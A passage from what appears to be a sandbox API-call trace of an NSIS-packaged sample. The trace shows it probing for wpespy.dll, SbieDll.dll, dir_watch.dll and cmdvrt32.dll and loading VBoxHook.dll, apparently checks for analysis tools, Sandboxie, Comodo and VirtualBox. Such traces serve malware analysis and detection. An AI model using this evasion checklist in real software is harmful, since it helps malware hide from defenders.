(lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.957] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.957] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.957] GetFileAttributesA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll")) returned 0x2020 [0157.957] CreateFileA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, 
dwFlagsAndAttributes=0x2020, hTemplateFile=0x0) returned 0xffffffff [0157.957] lstrcpynA (in: lpString1=0x31441c, lpString2="kernel32::GetModuleHandle(t 'wpespy.dll') i.R0", iMaxLength=1024 | out: lpString1="kernel32::GetModuleHandle(t 'wpespy.dll') i.R0") returned="kernel32::GetModuleHandle(t 'wpespy.dll') i.R0" [0157.957] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.957] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.957] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.957] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0157.957] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0157.957] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0157.957] lstrcpyA (in: lpString1=0x3217a0, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0157.957] lstrcpyA (in: lpString1=0x321bb0, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0157.957] lstrcpyA (in: lpString1=0x321fb0, lpString2="GetModuleHandle" | out: lpString1="GetModuleHandle") returned="GetModuleHandle" [0157.958] lstrcpynA (in: lpString1=0x323058, lpString2="wpespy.dll", iMaxLength=1024 | out: lpString1="wpespy.dll") returned="wpespy.dll" [0157.958] GetModuleHandleA (lpModuleName="kernel32") returned 0x75c90000 [0157.958] GetProcAddress (hModule=0x75c90000, lpProcName="GetModuleHandle") returned 
0x0 [0157.958] lstrlenA (lpString="GetModuleHandle") returned 15 [0157.958] GetProcAddress (hModule=0x75c90000, lpProcName="GetModuleHandleA") returned 0x75ca1245 [0157.958] lstrcpynA (in: lpString1=0x3217a0, lpString2="wpespy.dll", iMaxLength=1024 | out: lpString1="wpespy.dll") returned="wpespy.dll" [0157.958] lstrcpynA (in: lpString1=0x314418, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.958] GetModuleHandleA (lpModuleName="wpespy.dll") returned 0x0 [0157.958] lstrcpynA (in: lpString1=0x314418, lpString2="wpespy.dll", iMaxLength=1024 | out: lpString1="wpespy.dll") returned="wpespy.dll" [0157.958] wsprintfA (in: param_1=0x314418, param_2="%d" | out: param_1="0") returned 1 [0157.958] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0157.958] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0157.958] lstrlenA (lpString="0") returned 1 [0157.958] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.958] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.958] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.958] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.958] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0157.959] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: 
lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.959] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.959] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.959] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.959] GetFileAttributesA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll")) returned 0x2020 [0157.959] CreateFileA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x2020, hTemplateFile=0x0) returned 0xffffffff [0157.959] lstrcpynA (in: lpString1=0x31441c, lpString2="kernel32::GetModuleHandle(t 'SbieDll.dll') i.R0", iMaxLength=1024 | out: lpString1="kernel32::GetModuleHandle(t 'SbieDll.dll') i.R0") returned="kernel32::GetModuleHandle(t 'SbieDll.dll') i.R0" [0157.959] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.959] lstrlenA 
(lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.959] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.959] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0157.959] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0157.959] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0157.959] lstrcpyA (in: lpString1=0x3217a0, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0157.960] lstrcpyA (in: lpString1=0x321bb0, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0157.960] lstrcpyA (in: lpString1=0x321fb0, lpString2="GetModuleHandle" | out: lpString1="GetModuleHandle") returned="GetModuleHandle" [0157.960] lstrcpynA (in: lpString1=0x323058, lpString2="SbieDll.dll", iMaxLength=1024 | out: lpString1="SbieDll.dll") returned="SbieDll.dll" [0157.960] GetModuleHandleA (lpModuleName="kernel32") returned 0x75c90000 [0157.960] GetProcAddress (hModule=0x75c90000, lpProcName="GetModuleHandle") returned 0x0 [0157.960] lstrlenA (lpString="GetModuleHandle") returned 15 [0157.960] GetProcAddress (hModule=0x75c90000, lpProcName="GetModuleHandleA") returned 0x75ca1245 [0157.960] lstrcpynA (in: lpString1=0x3217a0, lpString2="SbieDll.dll", iMaxLength=1024 | out: lpString1="SbieDll.dll") returned="SbieDll.dll" [0157.960] lstrcpynA (in: lpString1=0x314418, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.960] GetModuleHandleA (lpModuleName="SbieDll.dll") returned 0x0 [0157.960] lstrcpynA (in: lpString1=0x314418, lpString2="SbieDll.dll", iMaxLength=1024 | out: lpString1="SbieDll.dll") 
returned="SbieDll.dll" [0157.960] wsprintfA (in: param_1=0x314418, param_2="%d" | out: param_1="0") returned 1 [0157.960] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0157.960] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0157.960] lstrlenA (lpString="0") returned 1 [0157.960] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.960] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.960] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.961] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.961] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0157.961] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.961] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.961] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.961] lstrcpynA (in: lpString1=0x40a418, 
lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.961] GetFileAttributesA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll")) returned 0x2020 [0157.961] CreateFileA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x2020, hTemplateFile=0x0) returned 0xffffffff [0157.961] lstrcpynA (in: lpString1=0x31441c, lpString2="kernel32::GetModuleHandle(t 'dir_watch.dll') i.R0", iMaxLength=1024 | out: lpString1="kernel32::GetModuleHandle(t 'dir_watch.dll') i.R0") returned="kernel32::GetModuleHandle(t 'dir_watch.dll') i.R0" [0157.961] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.961] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.961] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.961] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0157.961] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") 
returned 0x75710000 [0157.961] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0157.962] lstrcpyA (in: lpString1=0x3217a0, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0157.962] lstrcpyA (in: lpString1=0x321bb0, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0157.962] lstrcpyA (in: lpString1=0x321fb0, lpString2="GetModuleHandle" | out: lpString1="GetModuleHandle") returned="GetModuleHandle" [0157.962] lstrcpynA (in: lpString1=0x323058, lpString2="dir_watch.dll", iMaxLength=1024 | out: lpString1="dir_watch.dll") returned="dir_watch.dll" [0157.962] GetModuleHandleA (lpModuleName="kernel32") returned 0x75c90000 [0157.962] GetProcAddress (hModule=0x75c90000, lpProcName="GetModuleHandle") returned 0x0 [0157.962] lstrlenA (lpString="GetModuleHandle") returned 15 [0157.962] GetProcAddress (hModule=0x75c90000, lpProcName="GetModuleHandleA") returned 0x75ca1245 [0157.962] lstrcpynA (in: lpString1=0x3217a0, lpString2="dir_watch.dll", iMaxLength=1024 | out: lpString1="dir_watch.dll") returned="dir_watch.dll" [0157.962] lstrcpynA (in: lpString1=0x314418, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.962] GetModuleHandleA (lpModuleName="dir_watch.dll") returned 0x0 [0157.962] lstrcpynA (in: lpString1=0x314418, lpString2="dir_watch.dll", iMaxLength=1024 | out: lpString1="dir_watch.dll") returned="dir_watch.dll" [0157.962] wsprintfA (in: param_1=0x314418, param_2="%d" | out: param_1="0") returned 1 [0157.962] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0157.962] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0157.962] lstrlenA (lpString="0") returned 1 [0157.962] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") 
returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.963] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.963] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.963] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.963] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0157.963] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.963] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.963] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.963] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.963] GetFileAttributesA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll")) returned 0x2020 [0157.963] CreateFileA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: 
"c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x2020, hTemplateFile=0x0) returned 0xffffffff [0157.963] lstrcpynA (in: lpString1=0x31441c, lpString2="kernel32::GetModuleHandle(t 'cmdvrt32.dll') i.R0", iMaxLength=1024 | out: lpString1="kernel32::GetModuleHandle(t 'cmdvrt32.dll') i.R0") returned="kernel32::GetModuleHandle(t 'cmdvrt32.dll') i.R0" [0157.963] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.963] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.963] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.963] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0157.963] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0157.964] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0157.964] lstrcpyA (in: lpString1=0x3217a0, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0157.964] lstrcpyA (in: lpString1=0x321bb0, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0157.964] lstrcpyA (in: lpString1=0x321fb0, lpString2="GetModuleHandle" | out: lpString1="GetModuleHandle") returned="GetModuleHandle" [0157.964] lstrcpynA (in: lpString1=0x323058, lpString2="cmdvrt32.dll", iMaxLength=1024 | out: lpString1="cmdvrt32.dll") 
returned="cmdvrt32.dll" [0157.964] GetModuleHandleA (lpModuleName="kernel32") returned 0x75c90000 [0157.964] GetProcAddress (hModule=0x75c90000, lpProcName="GetModuleHandle") returned 0x0 [0157.964] lstrlenA (lpString="GetModuleHandle") returned 15 [0157.964] GetProcAddress (hModule=0x75c90000, lpProcName="GetModuleHandleA") returned 0x75ca1245 [0157.964] lstrcpynA (in: lpString1=0x3217a0, lpString2="cmdvrt32.dll", iMaxLength=1024 | out: lpString1="cmdvrt32.dll") returned="cmdvrt32.dll" [0157.964] lstrcpynA (in: lpString1=0x314418, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.964] GetModuleHandleA (lpModuleName="cmdvrt32.dll") returned 0x0 [0157.964] lstrcpynA (in: lpString1=0x314418, lpString2="cmdvrt32.dll", iMaxLength=1024 | out: lpString1="cmdvrt32.dll") returned="cmdvrt32.dll" [0157.964] wsprintfA (in: param_1=0x314418, param_2="%d" | out: param_1="0") returned 1 [0157.964] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0157.965] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0157.965] lstrlenA (lpString="0") returned 1 [0157.965] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.965] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.965] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.965] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.965] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", 
lpString2="") returned 1 [0157.965] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.965] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.965] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.965] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.965] GetFileAttributesA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll")) returned 0x2020 [0157.965] CreateFileA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x2020, hTemplateFile=0x0) returned 0xffffffff [0157.965] lstrcpynA (in: lpString1=0x31441c, lpString2="kernel32::LoadLibrary(t 'VBoxHook.dll') i.R0", iMaxLength=1024 | out: lpString1="kernel32::LoadLibrary(t 'VBoxHook.dll') i.R0") returned="kernel32::LoadLibrary(t 'VBoxHook.dll') i.R0" [0157.965] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: 
lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.965] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.965] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.966] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0157.966] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0157.966] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0157.966] lstrcpyA (in: lpString1=0x3217a0, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0157.966] lstrcpyA (in: lpString1=0x321bb0, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0157.966] lstrcpyA (in: lpString1=0x321fb0, lpString2="LoadLibrary" | out: lpString1="LoadLibrary") returned="LoadLibrary" [0157.966] lstrcpynA (in: lpString1=0x323058, lpString2="VBoxHook.dll", iMaxLength=1024 | out: lpString1="VBoxHook.dll") returned="VBoxHook.dll" [0157.966] GetModuleHandleA (lpModuleName="kernel32") returned 0x75c90000 [0157.966] GetProcAddress (hModule=0x75c90000, lpProcName="LoadLibrary") returned 0x0 [0157.966] lstrlenA (lpString="LoadLibrary") returned 11 [0157.966] GetProcAddress (hModule=0x75c90000, lpProcName="LoadLibraryA") returned 0x75ca49d7 [0157.966] lstrcpynA (in: lpString1=0x3217a0, lpString2="VBoxHook.dll", iMaxLength=1024 | out: lpString1="VBoxHook.dll") returned="VBoxHook.dll" [0157.966] lstrcpynA (in: lpString1=0x314418, lpString2="", iMaxLength=1024 | out: lpString1="") 